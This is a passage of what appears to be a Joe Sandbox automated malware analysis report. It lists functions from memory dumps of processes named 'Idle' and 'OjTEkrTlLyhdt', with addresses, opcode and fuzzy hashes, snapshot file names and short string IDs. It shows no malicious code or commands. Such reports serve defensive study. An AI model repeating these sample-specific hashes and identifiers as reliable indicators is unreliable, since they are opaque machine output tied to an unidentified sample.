                  • Opcode Fuzzy Hash: d0807ba500f141244450ad29341129d5fd2ee8ed234862f65c21a13c19873d01
                  • Instruction Fuzzy Hash: DC01A93090F78E8FDB95DF64C8651E93FA0FF55300F4520BBE458C60A2EA789654C741
                  Function 00007FFD9BA105D0 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 463d95590fd9bfa1d2cbc56c6e367a9a14648a81bc470993842f948f960243af
                  • Instruction ID: 18227cce237956ebf000dfc89575f0d0c7540a8c47b64b7f727476ec1d419fe8
                  • Opcode Fuzzy Hash: 463d95590fd9bfa1d2cbc56c6e367a9a14648a81bc470993842f948f960243af
                  • Instruction Fuzzy Hash: 1EF0C230A0A64E8FEBD8EF6484256FA37A4EF25304F11147AE81DC31A1DE79A650CB80
                  Function 00007FFD9BA2FB62 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0c7f2110bd9e0be50f16aa4a4d06a287e47ec83d53131d82b1268cd83ca8f901
                  • Instruction ID: 0204a9186719e8bfa0583486ce07af3b62b5fa7198b0f2b3c64605b9fef0f813
                  • Opcode Fuzzy Hash: 0c7f2110bd9e0be50f16aa4a4d06a287e47ec83d53131d82b1268cd83ca8f901
                  • Instruction Fuzzy Hash: 2FF06D3698F2C99FD7269BB088715E93FA4AF52214B1900E6E445C70A2C9AE2646C761
                  Function 00007FFD9BA2563B Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a25593c67898bc8b3250c45cb2e21fbf31211b37ba37b09efaec5a484259136b
                  • Instruction ID: 653751018d0859fbb63d5c0140d02e7e0aa156784826df7af164cc7659898101
                  • Opcode Fuzzy Hash: a25593c67898bc8b3250c45cb2e21fbf31211b37ba37b09efaec5a484259136b
                  • Instruction Fuzzy Hash: 7FF03771E5991C8EDFA4EB9888957ECB7B1FF58300F414066D40CE3252DF3869808B00
                  Function 00007FFD9BA1C219 Relevance: .0, Instructions: 38COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3839584144ea72b02090a7ddc5e9219bc136a728ead71d1343bcd16a997a4b2f
                  • Instruction ID: a969375f62a61cdd73eb5f051343e8b05d91c9a373adeb1238f581193ddffb9b
                  • Opcode Fuzzy Hash: 3839584144ea72b02090a7ddc5e9219bc136a728ead71d1343bcd16a997a4b2f
                  • Instruction Fuzzy Hash: ED01A23090E78E4FDB95AFA888652FA7BB0FF16200F4601BBD458C61A2EB785644C740
                  Function 00007FFD9BA10FB4 Relevance: .0, Instructions: 37COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e61c1fc8f7bd6094e355b5da011f7f10800573bfb401bf61e49501fed6d1b853
                  • Instruction ID: f26c7e864d87196d053e1d04afad02792f09db7d5ee6b676d0ad31d1056f9069
                  • Opcode Fuzzy Hash: e61c1fc8f7bd6094e355b5da011f7f10800573bfb401bf61e49501fed6d1b853
                  • Instruction Fuzzy Hash: 7A016D30F0550E8BEB60EF58C890AEEB3B1EB44311F1181B6D409E7294DE75AE448F84
                  Function 00007FFD9BA12809 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 039302d68edd41eb5b3b7b66621263b8221b2afc6b497b8c390a58bc1f529f38
                  • Instruction ID: ef536e20907435eade4cb9562d6ca5f1ce3e862e9208ce0a7bcf21cf37bdcff0
                  • Opcode Fuzzy Hash: 039302d68edd41eb5b3b7b66621263b8221b2afc6b497b8c390a58bc1f529f38
                  • Instruction Fuzzy Hash: 3EF0AF3090E38D8FEBAA9F7488252A93B60EF56204F4614FAD449C60E2DA68D548C701
                  Function 00007FFD9BA1B37F Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dcf8f88898a526362b1bba2232f9e3876bc3e272bc9720251047fe7184738799
                  • Instruction ID: f6620e3617b5a48846cd5793ad5f73618a67fcd472e0a17340ec268d07fb565b
                  • Opcode Fuzzy Hash: dcf8f88898a526362b1bba2232f9e3876bc3e272bc9720251047fe7184738799
                  • Instruction Fuzzy Hash: C6017170E0961E8FDFA4DB90C490AFEB3B1EF54310F515676C409A2295DF78AA85CB90
                  Function 00007FFD9BA2E162 Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8834c02a4c340f2bee1ebef5afb6e25b4042970ad0883364efa77d73e51ce7cb
                  • Instruction ID: 2f9c8b1ada421820fce9e78b6dc55e881ca5c084837081fae59ef25d6beb49fa
                  • Opcode Fuzzy Hash: 8834c02a4c340f2bee1ebef5afb6e25b4042970ad0883364efa77d73e51ce7cb
                  • Instruction Fuzzy Hash: E7F0E77191991D9FCB95DF58D4A4A9DB7B0FF69310F2001AAD40AE7260DA71AA81DF00
                  Function 00007FFD9BA2E3F4 Relevance: .0, Instructions: 31COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 03b4e3316d924be552ade6185ec6b54d960c3f6080b4da401e1f7ca6e7f3ddb2
                  • Instruction ID: b09cbc600a4ca51f02943de58b57200efc21ec19c32600fd894e0b6384d83623
                  • Opcode Fuzzy Hash: 03b4e3316d924be552ade6185ec6b54d960c3f6080b4da401e1f7ca6e7f3ddb2
                  • Instruction Fuzzy Hash: A9F0127090995CCFDF54DF58C854ADDBBB1FF25305F1400A9D00EAB260CA75A9C1CB00
                  Function 00007FFD9BA284DC Relevance: .0, Instructions: 30COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 96cdfb13ef8a1cc31f3a1c05ec0f38567a93dace88ad9ede349803e0dd38c442
                  • Instruction ID: 48d635ff116071083cbf1abecb5e02499339d95f7da01a29186f2c5dd51e32dc
                  • Opcode Fuzzy Hash: 96cdfb13ef8a1cc31f3a1c05ec0f38567a93dace88ad9ede349803e0dd38c442
                  • Instruction Fuzzy Hash: E3F0EC70E1561C4EDBA4EB58C4597A9B3B1FF55300F5040EAD44CD3262DF305A858F01
                  Function 00007FFD9BA26BDB Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7da15b9b2eb799014c6d2f7b828ab1dbdda183a908d5da82033b4d2824747cb4
                  • Instruction ID: 8e576a84258430c9164d6ce8600f10f0f86b00a7158c598329384fe8342a5cac
                  • Opcode Fuzzy Hash: 7da15b9b2eb799014c6d2f7b828ab1dbdda183a908d5da82033b4d2824747cb4
                  • Instruction Fuzzy Hash: 7AF0A970D5951E8FEBA8EB99D4A4BFCB7B1EB54305F1140BED41DA2291CE781A80DF00
                  Function 00007FFD9BA280E7 Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 73f6f367275709d2464e116c2e20aef8bf1b4083e5cfe6e71a2ae77569c070cb
                  • Instruction ID: d45201c30252bb0169023960ee00bc9e68faedccf365fbe20904fad69884a553
                  • Opcode Fuzzy Hash: 73f6f367275709d2464e116c2e20aef8bf1b4083e5cfe6e71a2ae77569c070cb
                  • Instruction Fuzzy Hash: BFF05E36B4954A8BDB28DF84CC619FD73B2BFA4751B05017AD416DB2EADEB429018B40
                  Function 00007FFD9BA3546D Relevance: .0, Instructions: 12COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ba8496951a8da90808f32b37f52f30ba607f2e759683cb9722b24a33d03c0572
                  • Instruction ID: c5d5a2a90fa71c69dd772d458388e626d8d1efd5581f20286195eee31a16bc38
                  • Opcode Fuzzy Hash: ba8496951a8da90808f32b37f52f30ba607f2e759683cb9722b24a33d03c0572
                  • Instruction Fuzzy Hash: 7BC012A1F09A0D4EFB94964C5CE59FC5791EB14200F100036840DD71A2DD6A24818780
                  Function 00007FFD9BA3134B Relevance: .0, Instructions: 11COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b7601b3eeb62f93791d0ac5fee9ea208b3d5f8b13c476006fdac41f6d1d1e909
                  • Instruction ID: 7f098508fec56914d9c2f335a12ec6e884c0a8a0fd7c464a6b00c47040f86d1e
                  • Opcode Fuzzy Hash: b7601b3eeb62f93791d0ac5fee9ea208b3d5f8b13c476006fdac41f6d1d1e909
                  • Instruction Fuzzy Hash: 5FD0C910F0F64F85F6F8978181B027D2190AF20710EA6003DC09F41CF9CD9CBB016206
                  Function 00007FFD9BA2E14A Relevance: .0, Instructions: 11COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b9e99988e234242d5d6097d1341b5084e435fcd210e062595d2b6c091752d155
                  • Instruction ID: c560c38a8aa7f0ee6814138e62991b1009aec4d4c038d17c24398e3ffa4c1834
                  • Opcode Fuzzy Hash: b9e99988e234242d5d6097d1341b5084e435fcd210e062595d2b6c091752d155
                  • Instruction Fuzzy Hash: 27D09231E4E55E8ED7ADDB54C8A26E87760AF09340F1144FA820D962A1CD686AC09B90
                  Function 00007FFD9BA21000 Relevance: .0, Instructions: 10COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9682e2eb882dbc12da03e8a46b426f9b455c90892acb0c24ff629346dc22ed28
                  • Instruction ID: 3d7c6bb2f21c2e3b2d5478157c47965f9ea344177656a9e7a68a443595687210
                  • Opcode Fuzzy Hash: 9682e2eb882dbc12da03e8a46b426f9b455c90892acb0c24ff629346dc22ed28
                  • Instruction Fuzzy Hash: 9EC0023591495E9FDF91EF94D8555EE73A1FF54201B000526E82DD3151DB70A6208B40
                  Function 00007FFD9BA30871 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 64c5c841c55421cd63636ed617b7774ae5966390cd8163725da3f6074ad95fa3
                  • Instruction ID: 052f03a2faaf1afede4777ca9cb33826ced49c55b963990d3835bcad29c9a5f1
                  • Opcode Fuzzy Hash: 64c5c841c55421cd63636ed617b7774ae5966390cd8163725da3f6074ad95fa3
                  • Instruction Fuzzy Hash: C5B01200F0E30B43F13402F0087023C04400B45A40F520531D50B451F3DCCC3A001354

                  Non-executed Functions

                  Function 00007FFD9BA21019 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$#$&$)$+$[$}
                  • API String ID: 0-4069700903
                  • Opcode ID: af9eee0662d6b420f4f0a570dadbc16d8d91892d1700734ea4982e5023066517
                  • Instruction ID: 553d3572f21b32a316ae59450cea28a1915738e9079c181c12a5d7a778d5b92d
                  • Opcode Fuzzy Hash: af9eee0662d6b420f4f0a570dadbc16d8d91892d1700734ea4982e5023066517
                  • Instruction Fuzzy Hash: ACA1E570E0966D8EEBA8DF94C8A47EDB7B1BF54300F5140BAD04DA7291DBB85A84DF00
                  Function 00007FFD9BA2D378 Relevance: 5.5, Strings: 4, Instructions: 460COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: mK_^$nK_^$oK_^$pK_^
                  • API String ID: 0-518264926
                  • Opcode ID: 7ebf81088440f1df9f170bc64a5bfd84a173096d4bb886d109d958cc882b9781
                  • Instruction ID: 8c3ed47a136efc984eab0fec45f30e555a57b3ed8401f2c51f20eda91e268987
                  • Opcode Fuzzy Hash: 7ebf81088440f1df9f170bc64a5bfd84a173096d4bb886d109d958cc882b9781
                  • Instruction Fuzzy Hash: BDD17313B0F5A71BE716B76CA8F59E63FD0DF0222870A42F7E49D490E3DC0A694D8295

                  Executed Functions

                  Function 00007FFD9BA03655 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: M_H
                  • API String ID: 0-372873180
                  • Opcode ID: 3e26a509ffc441c7397234ee71599ecc61001c5f49f1ebcb3b4ae3b4dbabba02
                  • Instruction ID: 144ce2f9288ddf293b70d760b6d8df84bc6e7ce1db85e309154f701f32ca8cfc
                  • Opcode Fuzzy Hash: 3e26a509ffc441c7397234ee71599ecc61001c5f49f1ebcb3b4ae3b4dbabba02
                  • Instruction Fuzzy Hash: 9391C171A1994E8FEB54DB68C8657AC7BE1EF9A310F5102FAD04DD72DACBB428058B40
                  Function 00007FFD9BA0EA63 Relevance: 3.9, Strings: 3, Instructions: 138COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: >$N$c
                  • API String ID: 0-2822027293
                  • Opcode ID: dee926cbde86f8d9928a42991ba40dd94f260414554b9950dc9d5161046f7e05
                  • Instruction ID: 4e9ad34a771aff76b65910e1ea28bbfdc1b26f5af40d32daa956d80f8c863e5d
                  • Opcode Fuzzy Hash: dee926cbde86f8d9928a42991ba40dd94f260414554b9950dc9d5161046f7e05
                  • Instruction Fuzzy Hash: 9D5124B1E0562D8BDBA8DF18C8947A8B7B1FF59301F0041FAE14DE32A1DA746E818F41
                  Function 00007FFD9BA11297 Relevance: 2.6, Strings: 2, Instructions: 54COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: '$/
                  • API String ID: 0-2558154120
                  • Opcode ID: 8ee8baa632278cfb3e8b985c63f81ae3cdb059dd99bd97111358686d03bcceed
                  • Instruction ID: 414f2814d692274a92245a53f5c52e02d8a665ac54643b46c4497af0d1c8144d
                  • Opcode Fuzzy Hash: 8ee8baa632278cfb3e8b985c63f81ae3cdb059dd99bd97111358686d03bcceed
                  • Instruction Fuzzy Hash: 5121DA70D0922E8FEBB4DF94C8907FDB7B0AB14301F1154BAD41DA7695DA786A84DF40
                  Function 00007FFD9BA17671 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: U
                  • API String ID: 0-3372436214
                  • Opcode ID: ad13a3b8ab09455ecedaf20a99897870a1881c16793e9c05113dd894c308017e
                  • Instruction ID: c26935e1a9c27d7da1440e336aeb23ea9437a5a816c3003bb8072b98d7d7391e
                  • Opcode Fuzzy Hash: ad13a3b8ab09455ecedaf20a99897870a1881c16793e9c05113dd894c308017e
                  • Instruction Fuzzy Hash: 1111C470A1950E8FE791EBB8C8586EA7BF0FF19305F0118B6D428C30A5DA78A6408B50
                  Function 00007FFD9BA0EF63 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID: O
                  • API String ID: 0-878818188
                  • Opcode ID: 26991cf8452ccacfe0d90af19eb0937e8cb1b313dabb00877a0059d338a664d8
                  • Instruction ID: 431554eadea0b3f640baf5deb716694e9b79763452558f75cc928dbc37922be6
                  • Opcode Fuzzy Hash: 26991cf8452ccacfe0d90af19eb0937e8cb1b313dabb00877a0059d338a664d8
                  • Instruction Fuzzy Hash: 23D092B0E0961D8EDBA0DF28C8557AC76F0BF28304F0000B5958CD2291CB746A819F08
                  Function 00007FFD9BA1363D Relevance: .5, Instructions: 454COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a80f9a74e09d36195121496980b43895bcc4f5a8ec72cb613ab03973f662efe6
                  • Instruction ID: 09ea011a54ce255963a4edca42040fafeb57a933f36b883e0072958de1838ebb
                  • Opcode Fuzzy Hash: a80f9a74e09d36195121496980b43895bcc4f5a8ec72cb613ab03973f662efe6
                  • Instruction Fuzzy Hash: D411B620A0E68D5FE753EF7888745A97FF0EF16300F0A05F7D499C71A7DA64A6048752
                  Function 00007FFD9BA0DAA9 Relevance: .4, Instructions: 416COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d0b81a5e8837e639f2a9ccdd07ad2fdfde98709fd819afeb6bbeb86e8b9778af
                  • Instruction ID: a7d50a3d729bfd962f70b3f1b2b8280e09716e0d19ab4fdfb68ee3fe929f65aa
                  • Opcode Fuzzy Hash: d0b81a5e8837e639f2a9ccdd07ad2fdfde98709fd819afeb6bbeb86e8b9778af
                  • Instruction Fuzzy Hash: 78E16D71E1964D8FEBA8EB68C4A47B8B7A1FF59301F0101BED44ED32E6CA756944CB40
                  Function 00007FFD9BA01718 Relevance: .3, Instructions: 289COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e7e647d93361e04eb72429d1414635657f1313ed478db642e00ac43488b3d428
                  • Instruction ID: fe9080c16e0a1ae09953ba54ec67e4221a827042c6475637a7a1cca94b32688f
                  • Opcode Fuzzy Hash: e7e647d93361e04eb72429d1414635657f1313ed478db642e00ac43488b3d428
                  • Instruction Fuzzy Hash: 5191E031B0DA4D4BDB58DF5C88606B977E2EFAA300F15417AE48DC3292DE30AD06C780
                  Function 00007FFD9BA0C8FD Relevance: .2, Instructions: 213COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5cd04cc20b734108dc7e6cf0620c9309b4a98decd76b31dbcc04656a815946d8
                  • Instruction ID: f82a67c0c22fb42639d302954af520feee62b4b1a1dbf0aa5e7fed9a82fefa8a
                  • Opcode Fuzzy Hash: 5cd04cc20b734108dc7e6cf0620c9309b4a98decd76b31dbcc04656a815946d8
                  • Instruction Fuzzy Hash: 7E512923B0D12B4AF316B7ACB4618FD7790DF42334F0A02B7D59E890E7ED1E25898294
                  Function 00007FFD9BA13CFA Relevance: .2, Instructions: 205COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba11000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e04037ae2fd79ce608848f9873c3bd8f18a65a215f5d752bf0a62b53b65e6084
                  • Instruction ID: 1802dfb615021de0062611af4216ebbe4e24053ef5563e5b2bf9bbc969d56a79
                  • Opcode Fuzzy Hash: e04037ae2fd79ce608848f9873c3bd8f18a65a215f5d752bf0a62b53b65e6084
                  • Instruction Fuzzy Hash: 0D518C2770A96E1AE750BB6CFC648F9BBD0EF91373B0507B3D148CA092DE21650D87A1
                  Function 00007FFD9BA01D6D Relevance: .2, Instructions: 188COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c6f3b8a57e3fd8c75c25dcf03778dfe5cdd06d86b05c779b09d89df1d2f7882
                  • Instruction ID: 318a6cd389d2e86e73fe56092dd835dc920b7e4002da21a43b9d6fdbb2bed6bc
                  • Opcode Fuzzy Hash: 6c6f3b8a57e3fd8c75c25dcf03778dfe5cdd06d86b05c779b09d89df1d2f7882
                  • Instruction Fuzzy Hash: C451CF31B18A4D4FDB58DF4888645BA73E2FFEA304F15457EE49AC3296DE34E9028780
                  Function 00007FFD9BA03291 Relevance: .2, Instructions: 174COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba00000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f9cdb13562eca5aa2999d3de2725538c422f58ef3540b1a14ca9dafd216bec75
                  • Instruction ID: 147724c9544a966694057575670e662cebb1a51b0ae0579c78d0997abe47ba6d
                  • Opcode Fuzzy Hash: f9cdb13562eca5aa2999d3de2725538c422f58ef3540b1a14ca9dafd216bec75
                  • Instruction Fuzzy Hash: DA516B70E0961E8FEB64DBA8C4A46EDBBF1FF59301F51403AD049E72A5DB786A44CB10
                  Function 00007FFD9BA0C299 Relevance: .2, Instructions: 170COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000017.00000002.1842555389.00007FFD9BA0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_7ffd9ba0a000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 902b0f91d2495cfcbe1c774362b6bab6f1322b96c558590c56b9951464fd2faa
                  • Instruction ID: 96cc10868bd6f36931361f4684577a9426c23c796ba54cbe392d62f46fa6548d
